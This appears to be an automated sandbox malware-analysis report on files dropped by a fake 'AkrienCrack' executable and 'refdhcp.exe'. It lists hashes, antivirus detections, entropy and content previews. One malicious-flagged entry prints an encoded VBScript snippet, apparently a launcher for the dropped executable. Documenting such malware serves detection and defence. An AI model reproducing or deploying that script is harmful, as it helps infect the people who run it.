            Preview:RHEFNbScMxwaZYBVE6WBSY7qilYBLV8uWZ4bFxSmlsWgtmFETApO2de2JXhlCRQ0yBD9ekPRotajBa76fUrLqu225BRsPqjUcfrsiGktuYjID40salFsjEKEJLEcShB8KFHgtOXZt8aRKuzAKiRok0uXVniXBIaNXl77wU9LNq9lo23YVERtPXYTVuLFqAXlhM4jw2N0iGa31JsctKB70q7AMnmCJ4fMSXEb7Umd0aLJ6ecMBsVf8au0P4WIQLqokNldEQeZiiGZfyDsLZAai9N2nNMC7dNpuhit39HvO67aTUVa1o70KQFl9t01DbcEVbp8PUzMSPMmCxiS2wLSfXfdb7tJIPrwd2F2oWKgzvh5EdjMKh9RQJi76MgSkpDChZIJrqoflocuzjZ7Yh9lQZgUTH6cz26KrfXoVZee3dqlryIWxj4DpcvI3yzkuLpssSCUMum8Cfrxs4mf8joQ82fPtOvhk4trx83ZvyJD65AKu8Z8LTlKhYuzwxk78FYIvA9uBNuKZlUC1UfuzxVQTjKYNDm7NME1h2Zt8o67jav5Er8cS0ILtHzM0kg8lw7Nhcf95vvK0Xr2xOUgFKpXD2HaCM3YI8WwdhYlL8ghE8VVZ6YlQ93bGjJoVF6s1XB1B4ZPzsUGnITEhwAGySHIF5p3YuQGBxpq6dUfhIvipwx8QEGiE04jQ3wGOf1FbOEzcmHDcfiqgjdSHrmTnrBK3GZDrNQBQqGas8fn7DGjSODrae9h2ibuM45WNEWOOgZzdCkIL9Wkkc2pDsmMOsI
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (441), with no line terminators
            Category:dropped
            Size (bytes):441
            Entropy (8bit):5.836242424635494
            Encrypted:false
            SSDEEP:12:YlV5iSzz0kf5d4/Oprsitdwg8NukwSUmXyp:pSzNfWAsmHS1O
            MD5:D476D8D341169D6ACB24FF1C93CD6086
            SHA1:31FB7EF87B3D641770394DF99559F959D6AD5A54
            SHA-256:D7E16698A7C0D25440776234D9DEFAE1FAA7CCAF8DA3C087141B8803574F7B37
            SHA-512:C4B0D4E9D2A2E75878B5746B01F9134C09FD5F849773E0607F7E4457C6D184CC31E11B6387155ECE5B9A4C092DE161680C35FEAEAE8A9FB0DBE2042F467D63A6
            Malicious:false
            Preview:E8ysfA6Kqa0Cxov3h9Kcr5lmpjtyL4xwYrNyXG5F2F1M5IE8gQDLPLtJWMD6QH9vnDoFa6fbDFjmDYrhevR41mhN8EbLC9yuGFj1e8hjvlHKlHF8ffbf0E4AgaHVeUYDQzf8zzCfNrJQeWm08dqhhS4BLjVD1LFaMD3vlHIpd6SI5ofJyQXBo1g85ewQe9oBmsDad0P1VAElAvFgDMPkyDwVh50HU2LdRRgNlEq8Bfpnx58JYQMRuEMi5s3h9IgczkTsO258gQjTXJhm7qsEp3tNF7S2LI929NyNlP4gUNvde2KwKQkSZcw50FnRkCxXRqUKUUArwMtbIQtMxfs4iqcga2Xgmn6RaXLyi9b0P2gNsUxkWadEU2zkNxuc7eFIQcBvE4nxE2oqKPyFFwKLJ17hhkkvP93vxX7PTBfbwq9cOJa88oWKU38Ye
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (521), with no line terminators
            Category:dropped
            Size (bytes):521
            Entropy (8bit):5.861497637043545
            Encrypted:false
            SSDEEP:12:5XKBkfoUno8CR+CZ1GnYIChTmnxVIDJVu8gbSF0CSSx/Jr0:BjaR+CZMCsXYJo8t0yx/y
            MD5:05439657A3DCB7D2469AA32CB178001E
            SHA1:7A0147C7C9AFC3D64A44E4706743A2AE50C2ADF6
            SHA-256:4E3343919813EC0E4B095B7B05F35ED33D4525FEDFAEC101FB1178E4BC5DD9FE
            SHA-512:E2BC48E82E1C74454FD2D5943A6440313773CF5AD44038D4AA0E204185C0EBF4375F4588C801C027378810CBD7CC6D8741827A1B70B9A8B9262DEE7E287767A1
            Malicious:false
            Preview:oYpKRomAgbzLJgLjjDtYN9nZu2wELPTZYDkioPEOqtGqqgILilPKhjSpvPaY2hzRHZxG6n5T9erd36sNulfj9J2zu4wYzpWI3yiQtCO5q5LD1zwzhMoQBQS8h7VB0geTHjjEYberWk2D7y85I71mAFGngjtvqNEJb26SPraFs74bXOBs9a22p2SBc6iyssBJftmF2qpbgv3DLpQSiAwPULeij4zTImWA5v5ol5zTvbW48O0xpQPs5vyUODf81VS4Z3IZtlqnKde3zkkUEBn2XoEJ7lZhZ1caIcfEGaEDjmicR5eodL3zraguy8cIMINSAEuXFfNo7kSvFl1CHuEO7mss5uPI761aYPcNKGj77P2HHvpNGaAbE8VYVCcVPFqBs1W0Jo1ALGQruklJECBg5ZWa4E2IoOr2j0YPZyEcjAQ7rnnubSQNDKGTf56FvtV6YYI3MVtQ8j74IYsQaHrW8eyYuEud28qzpUiSetiFiAOeMLLGNpooB984ktJHkQY92HOy0Zvri
            Process:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):28
            Entropy (8bit):4.066108939837481
            Encrypted:false
            SSDEEP:3:I5XyDNH:IW
            MD5:A805BF29E1F46428832B9BC66F0A175C
            SHA1:BAEEC70E6555E17881D07267842F209F17019F91
            SHA-256:E078B7C5A7CCF4EAF88061ECA9FE5D006AC8320EAD0F0DAACB4EF4024A729702
            SHA-512:8D5769AF1C188DF3E7DD3C5405F4D035A848664AD662F03EDDA8201EFFEF92B4F952ED2CA3EF2C0DD81007A83AB8D5B1708A6A636CC8EE21EB428553AAF74072
            Malicious:false
            Preview:"C:\Browserfont\refdhcp.exe"
            Process:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            File Type:data
            Category:dropped
            Size (bytes):194
            Entropy (8bit):5.743973649370226
            Encrypted:false
            SSDEEP:6:Gt0wqK+NkLzWbHK/818nZNDd3RL1wQJRvPberBVOs:GtFMCzWLKG4d3XBJoVV9
            MD5:432F008EF219E1A3DA27D49608245EE9
            SHA1:24995DB8627B9ED98042BFD347F5664FE7AC2EFA
            SHA-256:931546A195EF9C305D0A81BA4AFB09749E64EF000BC44B4FEDF1A4CF7EB63915
            SHA-512:08F5D52B5215CA372C3B18809BF64937CEDB41E67CD4C750ACA98A031B1EE4BCBE50F9426441FCB32388822BBC08FEA53D71BB689F8CD1C5DEFE83B6F9AAEC69
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:#@~^qQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJA.Khk+D6W.Oz4Dz}t9 8mYJB~!BP0msd+fDUAAA==^#~@.
            Process:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (599), with no line terminators
            Category:dropped
            Size (bytes):599
            Entropy (8bit):5.877480945030038
            Encrypted:false
            SSDEEP:12:l+aujKfN0/izj/m+TL2/QIhAfRNnRbCQ4IlIn+DsKOhqP8Q9Gg:lwjq0avAwRvbcIC+wKSTs
            MD5:553D6AC3B92412B9B0AEAD342F069F00
            SHA1:C8287BA96EEF0D70E02DD2F678D42B3CB70EB5B1
            SHA-256:4BCADD200FC490E5411226622D4C95BF0E74672C50715E490BA8A4D7C7828D70
            SHA-512:593C17BB3A5CF76D2F9FDDAB14FE8FE5A831925F53974E5FFB0678F94BBF5F5A5F0CA714521690518765619E829949744CD75B5EA501589EBDF154E60AD0FCB5
            Malicious:false
            Preview:7VwNuGDVBLajsUZPAfqGaXtq26GXy724TaNC0HTp0fRdAIFs6LdrD5KjmFUx9qhDTgQSGXY2LBQ5FQqu1YamdL1YPoauwfpJ8OKd2wmjwkfBoOdWZk6lP4jIp1Cc6nFpWH71FM2Ew1z3pzuBKEVMjD3DpCyAuJmJezphQmQMs1zYEqczHAS2S3GSN3LDX1UmOqY0KMuhyIerOf98j93t1t0ltWUWaMy0hMJXSlp4QuEJYYEr4MdY8kufzwHx2XGlToKBVlq7U8dGprMUSmcNsa16bohfe1B2ndzuNCWTgfEAHnzIjwfQ5323wOjrDLdc6kdM1cGPPIrNW1yyyZ6sVv7uk689dpQUClDhKnRGpQBxLph4Zv2oOuHLmsl5eHvk2WKuxRnKHzCFuKj5YDkswlFRe24cBWmiea5yewGHIrgZrBacJqgbgDyQQ2Q5XLIvMekTOual6cjEFqkcbbTVzLBbmpimgLu7jvMNbHOYQ5eDdtKkSxd51x6BcJrjMyEusmfUdWBUN4F4q872e7TsszFvyKuRaoMb0uV0O0G5wIr7sBVeMyFOeVB3htfSmt4jsnD5mGon1X6jHHDwzQFli76
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):235
            Entropy (8bit):5.824820039203209
            Encrypted:false
            SSDEEP:6:McA8ySdbMpPfjeSLkIs3nlfVmUP03H2fGsAZ3D:MW7db+PfjSR1EKOH2O1D
            MD5:8D22C711C1E37A2B2720950CF8C64761
            SHA1:E34520B359AC9A281760C30D0774D0CCA4EF3E9A
            SHA-256:26D4C4D9404EEE139593441BFAF0BA173F17F87025108E3140B733E3179EA59A
            SHA-512:7CDECAFF4C4F2BAD8A36A647ED1F2CA8828B2A8904073A880A709A73CFF566D08B74BE7260E411245FFC5BA108F65C3BE655C85DBE5CEA3B3A2F74A2788C5F12
            Malicious:false
            Preview:IPE7Z1FKbXHZbwZqsdVoTAuqjNKxJSCE3V828yZZ9bHkzEQq3xnU7Y4IeYYMqSAJUDfGxhs3D6o13J1e7e4WpsGea0XkaNsrb7QwiK2WFtRBuDOVg3PLYodm6Bp6JIc0O6a53E6wmhQ5bFuXlCDh8gTxenzhe5N7RawxmTbb7cj0XiL1QRVGE52rnnbPPYRqUToAS6vSllkf7cZ5c7RNkG2ViFJ82MMiK3fD3KjTgCf
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (434), with no line terminators
            Category:dropped
            Size (bytes):434
            Entropy (8bit):5.872859755194694
            Encrypted:false
            SSDEEP:12:/1GYPcmzkKkCqB/SSHn0pUd2xij8coIScxwCWG:/1G2cOkKHE0UR8cMr+
            MD5:5ABCAD4F18448D1FBCAD5575F4175E12
            SHA1:70A980FA9C063B21619BA035D573B2505DBCA384
            SHA-256:129062A0E3DD88D88224C79F2F7949BBD04C13C4838283AC8D4B4D5FF6E48C4B
            SHA-512:6E9018376387542128B924BC58DB7CD0533CDB21203B0D5BAF9A04AA3078C9593B6756405F0DDEEFFABC83634F3E38B5850F509704CCC2C33D8DE3E66C3AFE32
            Malicious:false
            Preview:2q2UvyNOX40V3M1JuBPTebJAfXrkHywFCid3sHH1zePSXXPfXMewxz5ag2yXHmHjIvSVs7bm4YdAM1mIIMN4T9RNmCX0StuNXpKmE3wav12ZW4OpPqO5ZMPIdFspkkUKoQnhqAEPZwJcH21ryrkmfzxKZBI8KG0KhrvFRq8Pl9fmCxAkOA12ArpyccHp1FES695aHvaItVAfTLImAhuKP8KzB6nyjTXg5MqD1kddksJprJfRUfoTU4D8zFYLIljZ7dkGeEuaERjgyeI1aVeDoELAJsOwMSV8JtsNjYwPuOPDUgJU7guwHfu3Sj7w08Nw6lWFw4SCjOSayIqmi3ypii0o8y59a9YwAdGtKEhCOrM2MUEJ3VO6KiNXusG79TljzgaVB7ceWvb0W7bouvFFvcmcPt8b7jD4FmDq4tH62tkYGXBwQc
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (507), with no line terminators
            Category:dropped
            Size (bytes):507
            Entropy (8bit):5.857028423164222
            Encrypted:false
            SSDEEP:12:OyUvt6M/q/2CVzIanMAmOsd0+iMnnryUOI0ab:3m/q+CCLAHJ+iMnnr1Ok
            MD5:40EE6C601EF9CE7D5259AD94AA07EAC5
            SHA1:38A8951C674032A1DC369CCC0D8B9D7E659F00B4
            SHA-256:B8AA787DA2EBDF37698B9F25353FB0A117AFCFFAA1763032B54FF01EEEE41B38
            SHA-512:7DECD9134756404F17DA16DF5C5B5F3188B4B57371B87F5925C6225C67B4EC8C64FAF197A4BC5DBA749F7270CCFA8631E2388732A79D98C3939698BEA37C3975
            Malicious:false
            Preview:ETjJzwXepXkZ9EOA1bmTvP6hRlzdQRyV9yLud3zjj8K0t0YwjLkMmYtyWC1N63OXjPZL2dg7mCtwFGxbND3EqlslEWXbClmpuxQeaN3Fomjjo7tQOaA3AJq7gyHfGE5AZDBRzTA9JyaDBJ7GnHNmltplGT7mGY9jrjKk5ba4ZAtLtm5X1A281TZqYaLgVY3vz0Wc8WLLrTMk9d2dXkvFfAsXJdMeQ3iBH8W2QdYezqRiGzq4irJvnxPzI8TfKq5xuLdBH9N4LQQzsJRTxS6itwXTshuRJ3UIvdy5WpwiePkWhaG8r9r2tWE7xJSjO5uS6HDPVV7IfXDeMAvSbwkKMcZYZ0HMWMTjeSaZW1mVBjXVTjvxY9IcVjFespzfOvvSEe94kV5jJOImFDF0FUyXE1O5M6rrBHHQxERzj0MCEjSGbdZpk9a47YONQEsnoNhCH1zAvPQOHvTeiHdshCHCqNTZ0EjeHjX0BQ9joY3UsLwLFtoIl9GmGfW3iZJ
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (613), with no line terminators
            Category:dropped
            Size (bytes):613
            Entropy (8bit):5.85439748006148
            Encrypted:false
            SSDEEP:12:0hFA6HmYxDmm3/3cmyXzQ3KWSCShtINCIY3Qr8YtGgb7UYgdP0AwH2L:H6HmYxDr3/3c7zMSzhtI7YAVGgFgRl
            MD5:217119E3A1D8A722AF7DEF05A433814A
            SHA1:31F6618FEBC66F139E007D5894F74C176E434736
            SHA-256:33CE25F3CACA5289C95C5282B943B92EF0C0AA997705705FA1B659B7A9D5EA19
            SHA-512:2216D9BC2E63CEAF4CD83FD16448DADCC750FCBCF5D81C0D885627CF39E06E86C9DDF88FDFBB7FA3F5D154257FCCE46471BD1FA8F5D6D3529CE4ECD4B955DD94
            Malicious:false
            Preview:iTOVKKMBH8EnrOL7TIhQfugI6qD9EGxcg3vTGUCLj6Y4MiL5F3FLPTGxxGZdGN6ALlGxc209FVriWl5XeI3LBmNNw8fA4jFW9XslbXcNDGF3mibMKB88Tv9jX3BeWzEfQVi82T6GpqI4gUkOhTz2kGCOYJOhW81NBjmQ9cT1E1SnnECDSw7C9L5JSUjtFZury436rUPEA8ytxZkUGKOjAyNzoc8o3jvpHlysLGW8h3CAXLV2uPm4LKq9rDSOVkKaNImMl1JAyPCHwMbcGF4n71e64yBHyHn6smxPjJR2GmF5IjNelzHQqgdVopRwzBLqmFZKZM37xBhUviyVlhf99WQLIbk32fCEaZTCJCFZ5Kcp9IkG15KSgMqPzNB7m9FS8c3WOvLibGDz4kM91dC6UuiNsEN5BIw5EKqgPO2Gtl1ZJ1UOBBGI7J7O4pnJiQhTTHuu4puml6Ms2IE0t849Bn85McmjkshdEhGBGkUVQdhB6OVvlwakViRpJyhbDLB3YsoVCDuJnisiG697H08xR7HfQa1RC3SFcomNk9shCR6xztjMzjUMNNlbkIFmLcGuPmFbUwXHHavABUqg1pcciF2ODLmb4GWkKLhMn
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):299
            Entropy (8bit):5.830864611308403
            Encrypted:false
            SSDEEP:6:5Eu4szPEpCThFdJL465U63OSmfBdIi0QLGCVM8RaH/xRRpe84mjk8iQR:yPUNFrfu63ODfbLGCrRa5npjrjk8iQR
            MD5:878A83980EAADB36E4F41A345BD04B01
            SHA1:8DFD936811D8B2A490D2E1445F4CD538E1CFBC44
            SHA-256:55C779FFE9B665A11211614EA3BF8FF9A64FB76CCC5B896F641D6CDEEB422B66
            SHA-512:2CCE7989C6D1C08594390E1E214D854B1CF4A1C89BB5EF3790567AB9BBA256F9FB1C5A38A8FCCEBE39AEEAC9AB4DA69C2F447162174B6DBEBB085E4FC945C7D2
            Malicious:false
            Preview:8Ahwsgut4vuAoJNB1NV2sLKfWzrjypv6oz71MyqkmS2fsMjDTwfqmNkwzCZ2yL4O9xWyLVyDhvPaTpwJQnQBKEUaPLBKYxvbXnf40v177bJ18JcKPPmK43E5d5iATopt9xDqK1TfwSDs5dcFs15ILkgdijb4M1oTwa1KGw9X6GYm0V99ddSbtghYRjHkZZS4nu6elS852hMFM3nNkbbtiMkP3d3hoY7gxe8FZfYLeWjLTcMX64A78jVbJqlHYbQdjqRs5hxEDQPMnY5bRgluXAiOIh6s3QwCFFmnKebYG54
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (303), with no line terminators
            Category:dropped
            Size (bytes):303
            Entropy (8bit):5.8148657978349085
            Encrypted:false
